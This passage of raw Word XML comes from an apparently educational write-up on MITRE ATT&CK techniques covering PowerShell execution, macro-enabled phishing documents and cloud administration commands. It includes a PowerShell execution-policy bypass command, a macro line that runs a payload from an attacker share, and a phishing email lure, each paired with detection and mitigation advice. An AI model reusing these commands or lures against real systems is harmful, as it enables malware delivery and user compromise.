        <w:spacing w:after="324" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="705" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>powershell.exe -ExecutionPolicy Bypass -File payload.ps1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11202E6B" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="187" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA17C77" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="210"/>
        <w:ind w:right="469"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The script silently downloads malware and starts it on the victim's PC </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4030A08C" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="321B41"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Detection: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248BE0FF" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Monitor for PowerShell processes using -ExecutionPolicy Bypass or hidden windows. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25434AB7" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use Windows Event Logging and PowerShell logging (Event ID 4104). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21960B2D" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Watch for PowerShell spawning suspicious child processes like cmd.exe, mshta.exe, etc. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143775C6" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="219" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EADD7CA" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="00A6ED"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Mitigation: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3C3653" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="187" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PowerShell Script Block Logging</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FCF51B" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Constrained Language Mode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to limit functionality. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7153D650" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Block PowerShell use for non-admin users. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38519C2C" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use Endpoint Detection and Response (EDR) tools to monitor behavior. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE1070C" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="187" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD820A4" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="259" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A68FFC7" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="15"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Technique 2:  T1204.002 – User Execution: Malicious File (Macro-Enabled Document) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29296B15" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FDCCC9" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Description: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A611CA" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="171"/>
        <w:ind w:left="-5" w:right="346"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Attackers often use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>macro-enabled Office documents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like Word or Excel files) to trick users into running malicious code. These macros are small programs that run when the document is opened — often used to download and execute malware. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090532E6" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="215" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277E6418" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="46A4FB"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Purpose: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D2AB96" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="171"/>
        <w:ind w:left="-5" w:right="346"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">To </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bypass technical controls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> by leveraging human behavior. The attacker tricks the victim into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>manually enabling macros</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, which silently runs malicious scripts in the background. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0D5C2E" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A961D83" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Real-world Use: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF70B66" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="171"/>
        <w:ind w:left="-5" w:right="346"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">FIN7 and APT28 (Fancy Bear) used phishing emails with fake invoices and reports containing malicious macros to compromise finance and government sectors. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7D159B" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB2B512" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Commands / Scripts: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED9649B" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="171"/>
        <w:ind w:left="-5" w:right="346"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Example malicious macro inside a Word document: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F56BD3"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44" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56362523"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0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Shell "powershell.exe -ExecutionPolicy Bypass -File \\attacker\payload.ps1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763BA559"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224" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69434E47" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="187" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561ED8E0" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="469"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This macro, once triggered, downloads a malware payload and executes it silently. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7872F678" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="259" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D66456A" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">PoC Scenario: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0781DC09" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attacker creates a Word file with an embedded macro. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE307BC" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="14"/>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Email is crafted to say: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAC6F31" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="730" w:right="469"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Subject:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Urgent Payment Request – Please Review Immediately! </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Attachment:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Invoice_Q3.docm </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453297F9" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Victim opens the document and clicks “Enable Macros.” </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FCF7F6" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Macro runs PowerShell command to download and run malware from attacker's server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C15D4D" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Victim’s system is infected without any visible alert. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C253101" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="222" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D5F1FD" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="730"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="321B41"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Detection: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB17636" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Monitor Office apps (e.g., winword.exe) launching PowerShell or CMD. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6610E6C2" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use Microsoft Defender or Sysmon to detect macro activity. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317184F5" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Watch for document files that spawn network activity or unexpected processes. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0674BB" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="187" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B91FF1" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660B640C" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="222" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0A182B" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="730"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="00A6ED"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Mitigation: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444E1478" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Block macros in Office files from the internet (Group Policy setting). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02741A30" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Disable automatic macro execution. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1D47B4" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use email security to filter suspicious attachments. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D549AEF" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Train employees to avoid enabling macros unless necessary. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C8ABCC" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="259" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A739D61" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="195"/>
        <w:ind w:left="730"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Technique 3:  T1651 – Cloud Administration Command </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70697E22" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="195" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A18CDC6" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="730"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Description: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449ADC4D" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="730" w:right="469"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attackers use built-in cloud administration tools (like AWS Systems Manager or Azure RunCommand) to remotely execute commands on cloud virtual machines (VMs). Since these tools are trusted and normally used by admins, attacks often go undetected. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040258BB" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="222" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6912C0D8" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="730"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="46A4FB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Purpose: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7D002E" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="730" w:right="469"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>gain remote access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to cloud-based infrastructure and execute malicious commands or deploy malware without needing direct access to the VM. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497C92CB" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="185" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B18446C" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="187" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D05B26E" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="184" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="730"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Real-world Use: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9B25F0" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="730" w:right="469"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Lazarus Group</w:t>
      </w:r>
      <w:r>
